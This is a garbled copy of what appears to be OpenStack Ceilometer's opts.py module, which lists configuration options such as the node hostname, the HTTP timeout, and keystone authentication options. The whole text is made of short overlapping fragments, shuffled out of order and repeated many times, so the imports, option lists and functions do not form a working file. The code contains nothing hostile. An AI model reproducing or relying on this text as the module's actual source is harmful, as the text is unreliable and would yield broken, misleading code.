#", "('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS,", "itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials',", "eNovance # # Licensed under the Apache License, Version 2.0 (the \"License\"); you", "ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file", "with the License. You may obtain # a copy of the License at", "keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root", "ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage", "ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination',", "ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS,", "ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options", "ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts", "recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS,", "ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager", "to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS,", "use this file except in compliance with the License. You may obtain #", "('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)),", "ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts),", "ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client", "BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF", "ceilometer.publisher.messaging import ceilometer.publisher.utils import ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS =", "implied. See the # License for the specific language governing permissions and limitations", "Copyright 2014 eNovance # # Licensed under the Apache License, Version 2.0 (the", "default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be valid in an AMQP", "you may # not use this file except in compliance with the License.", "import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import", "the options # for the password plugin that handles keystone v2 and v3", "KIND, either express or implied. See the # License for the specific language", "ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database',", "('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS),", "# under the License. import itertools import socket from keystoneauth1 import loading from", "import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this", "import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name", "ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter", "file except in compliance with the License. You may obtain # a copy", "socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app", "valid in an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ", "requests. Set it to None to ' 'disable timeout.'), ] def list_opts(): #", "with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options() + loading.get_auth_plugin_conf_options('password')))]", "\"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express", "('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS),", "] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains only the options #", "('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options # for", "('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi',", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)),", "ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS,", "distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY", "('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts), ('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS,", "specific language governing permissions and limitations # under the License. import itertools import", "import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import", "import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import", "ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht):", "options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)),", "only the options # for the password plugin that handles keystone v2 and", "the # License for the specific language governing permissions and limitations # under", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "Set it to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht):", "import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import", "None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces", "You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api',", "the generated configfile # This have been removed due to a recursive import", "import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import", "required by applicable law or agreed to in writing, software # distributed under", "ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling',", "ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw", "applicable law or agreed to in writing, software # distributed under the License", "('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS),", "list_opts(): # FIXME(sileht): readd pollster namespaces in the generated configfile # This have", "are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage',", "be valid in an AMQP ' 'key. Can be an opaque identifier. For", "ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS),", "in compliance with the License. You may obtain # a copy of the", "ceilometer.keystone_client.CLI_OPTS), ('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS),", "ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node,", "or agreed to in writing, software # distributed under the License is distributed", "only, must ' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout',", "ceilometer.sample import ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>',", "import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import", "('dispatcher_gnocchi', ceilometer.dispatcher.gnocchi_opts.dispatcher_opts), ('event', ceilometer.event.converter.OPTS), ('hardware', itertools.chain( ceilometer.hardware.discovery.OPTS, ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS),", "ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters", "host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests.", "License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS", "writing, software # distributed under the License is distributed on an \"AS IS\"", "('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration file contains", "ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS), ('dispatcher_file', ceilometer.dispatcher.file.OPTS), ('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts),", "import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import", "import socket from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import", "under the License. import itertools import socket from keystoneauth1 import loading from oslo_config", "This have been removed due to a recursive import issue return [ ('DEFAULT',", "oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery", "the specific language governing permissions and limitations # under the License. import itertools", "an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only, must", "ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector", "to None to ' 'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline", "valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP", "permissions and limitations # under the License. import itertools import socket from keystoneauth1", "Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not", "ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the options # for the", "password plugin that handles keystone v2 and v3 API # with discovery. But", "import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import", "API # with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options()", "2.0 (the \"License\"); you may # not use this file except in compliance", "FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it", "import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import", "'key. Can be an opaque identifier. For ZeroMQ only, must ' 'be a", "# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT", "License, Version 2.0 (the \"License\"); you may # not use this file except", "Can be an opaque identifier. For ZeroMQ only, must ' 'be a valid", "'disable timeout.'), ] def list_opts(): # FIXME(sileht): readd pollster namespaces in the generated", "plugin that handles keystone v2 and v3 API # with discovery. But other", "('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only", "ceilometer.hardware.pollsters.generic.OPTS)), ('ipmi', itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS, ceilometer.ipmi.pollsters.OPTS)), ('meter', ceilometer.meter.notifications.OPTS), ('notification', ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier',", "configfile # This have been removed due to a recursive import issue return", "ceilometer.storage import ceilometer.utils import ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of", "the License. import itertools import socket from keystoneauth1 import loading from oslo_config import", "import itertools import socket from keystoneauth1 import loading from oslo_config import cfg import", "ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute',", "ceilometer.notification.OPTS), ('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration", "in an AMQP ' 'key. Can be an opaque identifier. For ZeroMQ only,", "loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import ceilometer.api.controllers.v2.root import ceilometer.collector", "contains only the options # for the password plugin that handles keystone v2", "and limitations # under the License. import itertools import socket from keystoneauth1 import", "agreed to in writing, software # distributed under the License is distributed on", "the password plugin that handles keystone v2 and v3 API # with discovery.", "IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set it to None", "ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery", "' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout", "# Unless required by applicable law or agreed to in writing, software #", "readd pollster namespaces in the generated configfile # This have been removed due", "# This have been removed due to a recursive import issue return [", "by applicable law or agreed to in writing, software # distributed under the", "from keystoneauth1 import loading from oslo_config import cfg import ceilometer.agent.manager import ceilometer.api.app import", "under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "this node, which must be valid in an AMQP ' 'key. Can be", "import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import", "ZeroMQ only, must ' 'be a valid host name, FQDN, or IP address.'),", "name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600, help='Timeout seconds for HTTP requests. Set", "NOTE(sileht): the configuration file contains only the options # for the password plugin", "# # Licensed under the Apache License, Version 2.0 (the \"License\"); you may", "import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import", "except in compliance with the License. You may obtain # a copy of", "import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import ceilometer.pipeline import ceilometer.publisher.messaging import ceilometer.publisher.utils import", "import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import", "to in writing, software # distributed under the License is distributed on an", "import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import ceilometer.image.discovery import ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import", "ceilometer.volume.discovery OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must", "OPTS = [ cfg.StrOpt('host', default=socket.gethostname(), sample_default='<your_hostname>', help='Name of this node, which must be", "import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification import ceilometer.nova_client import ceilometer.objectstore.rgw import ceilometer.objectstore.swift import", "import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery import ceilometer.hardware.pollsters.generic import", "distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT #", "ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS), ('compute', ceilometer.compute.discovery.OPTS), ('coordination', ceilometer.coordination.OPTS), ('database', ceilometer.storage.OPTS),", "HTTP requests. Set it to None to ' 'disable timeout.'), ] def list_opts():", "ceilometer.ipmi.notifications.ironic import ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client", "# not use this file except in compliance with the License. You may", "and v3 API # with discovery. But other options are possible. ('service_credentials', ceilometer.keystone_client.CLI_OPTS),", "ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains only the", "limitations # under the License. import itertools import socket from keystoneauth1 import loading", "# License for the specific language governing permissions and limitations # under the", "ceilometer.api.controllers.v2.root import ceilometer.collector import ceilometer.compute.discovery import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "language governing permissions and limitations # under the License. import itertools import socket", "in writing, software # distributed under the License is distributed on an \"AS", "ceilometer.middleware.OPTS, ceilometer.nova_client.OPTS, ceilometer.objectstore.swift.OPTS, ceilometer.pipeline.OPTS, ceilometer.sample.OPTS, ceilometer.utils.OPTS, ceilometer.exchange_control.EXCHANGE_OPTS, OPTS)), ('api', itertools.chain(ceilometer.api.app.API_OPTS, ceilometer.api.controllers.v2.root.API_OPTS)), ('collector', ceilometer.collector.OPTS),", "Version 2.0 (the \"License\"); you may # not use this file except in", "ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control import ceilometer.hardware.discovery", "('polling', ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file", "import ceilometer.compute.util import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import", "ceilometer.ipmi.platform.intel_node_manager import ceilometer.ipmi.pollsters import ceilometer.keystone_client import ceilometer.meter.notifications import ceilometer.middleware import ceilometer.neutron_client import ceilometer.notification", "('service_types', itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS, ceilometer.image.discovery.SERVICE_OPTS, ceilometer.neutron_client.SERVICE_OPTS, ceilometer.nova_client.SERVICE_OPTS, ceilometer.objectstore.rgw.SERVICE_OPTS, ceilometer.objectstore.swift.SERVICE_OPTS, ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi',", "import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS, ceilometer.ipmi.notifications.ironic.OPTS, ceilometer.middleware.OPTS,", "ceilometer.volume.discovery.SERVICE_OPTS,)), ('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the", "\"License\"); you may # not use this file except in compliance with the", "ceilometer.agent.manager.POLLING_OPTS), ('publisher', ceilometer.publisher.utils.OPTS), ('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS), ('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS), # NOTE(sileht): the configuration file contains", "the Apache License, Version 2.0 (the \"License\"); you may # not use this", "2014 eNovance # # Licensed under the Apache License, Version 2.0 (the \"License\");", "# with discovery. But other options are possible. return [('service_credentials', ( loading.get_auth_common_conf_options() +", "not use this file except in compliance with the License. You may obtain", "must ' 'be a valid host name, FQDN, or IP address.'), cfg.IntOpt('http_timeout', default=600,", "('storage', ceilometer.dispatcher.STORAGE_OPTS), ('vmware', ceilometer.compute.virt.vmware.inspector.OPTS), ('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS), ] def list_keystoneauth_opts(): # NOTE(sileht): the configuration", "been removed due to a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS,", "sample_default='<your_hostname>', help='Name of this node, which must be valid in an AMQP '", "For ZeroMQ only, must ' 'be a valid host name, FQDN, or IP", "License for the specific language governing permissions and limitations # under the License.", "a recursive import issue return [ ('DEFAULT', itertools.chain(ceilometer.agent.manager.OPTS, ceilometer.api.app.OPTS, ceilometer.compute.util.OPTS, ceilometer.compute.virt.inspector.OPTS, ceilometer.compute.virt.libvirt.inspector.OPTS, ceilometer.dispatcher.OPTS,", "the configuration file contains only the options # for the password plugin that", "ceilometer.dispatcher import ceilometer.dispatcher.file import ceilometer.dispatcher.gnocchi_opts import ceilometer.dispatcher.http import ceilometer.energy.kwapi import ceilometer.event.converter import ceilometer.exchange_control", "import ceilometer.compute.virt.inspector import ceilometer.compute.virt.libvirt.inspector import ceilometer.compute.virt.vmware.inspector import ceilometer.compute.virt.xenapi.inspector import ceilometer.coordination import ceilometer.dispatcher import", "identifier. For ZeroMQ only, must ' 'be a valid host name, FQDN, or", "License. import itertools import socket from keystoneauth1 import loading from oslo_config import cfg", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #", "that handles keystone v2 and v3 API # with discovery. But other options", "ceilometer.neutron_client.SERVICE_OPTS, 